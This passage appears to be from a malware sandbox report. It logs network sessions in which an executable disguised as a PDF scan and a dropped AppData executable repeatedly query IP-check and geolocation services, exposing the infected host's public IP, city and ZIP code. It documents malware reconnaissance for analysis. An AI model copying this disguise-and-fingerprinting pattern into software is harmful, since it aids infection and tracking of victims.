Oct 25, 2024 09:17:11.194910049 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c46e58a9354c45df5e8e5c8600bc0bd5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:17:12.662090063 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:12.921621084 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 74ae288b422be402b65b6dbc8bf21c94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49714	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:13.550790071 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:14.416539907 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9d0fcec59629596947dd47fcbe32c103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:17:14.420986891 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:14.680291891 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49e826b208ac6e347cf0914b55b8706d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:17:15.646193027 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:15.904947996 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2184249c241c734384f13b48847f5487 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49716	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:13.724272013 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:14.589092016 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e25c691414f280f1277593ffa579752 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49719	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:15.383764029 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:16.256469011 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e13bbac4c34dd4c8971c4f570b8dc521 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49722	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:16.670674086 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:17.524621964 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a09bdb555a93547b453619b1ee379ccd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49723	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:17.028789043 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:17.901664972 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7415dae602fa8867c8b54048c82ad723 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49726	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:18.312068939 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:19.176733971 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b38828119e8ffc343ee0bb503759fce0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49727	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:18.693051100 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 09:17:19.559221983 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e3e9fd988c734c8a9d8171fa11f5bd42 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49730	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:20.903827906 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:21.771253109 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a37a7ce277eada53b3de25bfffbebf5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49731	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:20.904635906 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:21.776822090 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a0780e7c86d88096c2f619f588fc4954 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49734	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:22.541937113 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:23.404171944 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b41d6902069e2c9f53bd63fbd072ba6a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49735	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:22.548870087 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:23.404201031 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ac5f1481c89e5e6ed989cbda50193eba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49740	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:24.220299006 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:25.083581924 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6697c00b9b1eeec50ec5f393133c01c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49741	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:24.269423008 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:25.158359051 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c3b61d2404a707d46a2086305ea71dd3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49748	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:25.928317070 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:26.800252914 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:26 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 28a8c60bb6377b6ff62c7956091afde2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49750	132.226.247.73	80	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:27.575687885 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:28.658778906 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6ab488b1161a9e6f7136463cd0a13f12 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:17:28.669812918 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6ab488b1161a9e6f7136463cd0a13f12 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:12 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:12 UTC	890	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 308 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khsi9a6s%2BH0EtpYtiOW2xy7Ee47ZgPekC7rT0ALK6PJYTMLXHSTiB7Wcgmxz2G9jhu7oteWLY76haSXtcQT0Gt2C8aD5Cd5rgBMeGHFlGXto%2BSvzGJLui9PuXF2X4kLuxbID7Rjv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806cf1795de712-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1425898&cwnd=247&unsent_bytes=0&cid=4082db39bb026eaa&ts=330&x=0"
2024-10-25 07:17:12 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:13 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
